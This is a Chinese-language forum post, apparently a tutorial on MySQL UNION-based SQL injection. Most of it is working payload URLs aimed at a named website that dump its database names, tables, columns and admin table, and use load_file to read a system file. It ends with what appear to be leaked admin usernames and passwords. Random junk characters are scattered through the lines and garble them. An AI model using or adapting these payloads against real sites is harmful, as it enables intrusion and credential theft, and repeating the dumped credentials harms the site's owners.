此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似7 B# S6 j0 D' g4 u6 _
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人( d) N/ v6 X# h
9 I+ J; p; p$ D
! N4 K; a& E5 c) G0 T优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入/ z4 R$ g3 E) n3 X" s* g
& F9 v9 x( {. F% v$ F3 {
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...+ J, x J' s+ P( A/ }# K3 F2 W
% B4 G6 s, i; O3 o; J* H. E4 o下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示9 M+ a! |8 n6 a, |% o
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等& h4 A8 C5 Z0 f/ l
6 b4 W: u8 z# ` ~( {9 Z
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17( {# G/ ~2 \" J" D4 j/ x
+ b2 V, u+ O: l7 W: L
读出所有库:* U2 L) O# u1 }% d; S
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
5 U- \& a, I% d) F2 k
& `# b4 b; O& J9 r
5 D9 O2 B- o! T( l8 K F8 r
- Z7 C8 Q1 q2 k+ F读出所有表:
1 F% y0 Y. V: q: y; n+ h2 n+ {http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
1 P( V/ P6 {4 K
! J$ ~) z: c2 h# j& }/ l; V4 I; a7 J读出所有表字段:
d4 H& r0 U" P$ H. Fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)) D3 q0 X6 \# Q3 L; F
*/ (97,100,109,105,110)为admin的ascii码 依次类推
) ^: ?0 @2 {$ `" T# p
# c! L2 W- L4 j+ r `, L3 I- I( \' N读出所有表字段里的内容:3 H1 a8 f2 _, Y: d$ c8 J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
0 \, m Y' Z: `# d0 Z0 r6 B% [) o% r! b; ~* y% {3 f( `& Y; I* j
* \8 @! p7 K5 b# g- o7 L4 S
% P v+ y5 J9 t
' ]3 G( q9 J4 |- E% R5 y
" k( a! d9 q H O: H
2 u- [; i' a0 X4 g7 ]9 Z! Vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
& ]1 i' V+ B! u2 h. ~2 x o' w8 T8 r; u
) ? W8 H" A, q1 e. Jhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23& x/ r; D( v: w, `: ?8 W& p3 G
7 k4 y/ A& k; S% fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
4 s l$ b/ s. o# q; K# q7 a6 P0 u3 p! X) L0 F" n
" J7 W4 X# Z3 q& g7 y' b# Jhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23) p* r. f# G4 k* \4 x" b9 `. D4 ]
/ j( q+ d" N2 h) n
- d C% g+ q/ H8 D: N! I% I1 x! A webmaster:dzb521123,simlab:simadmin200432332 V9 A; ]2 p: @* n. I2 K3 e
|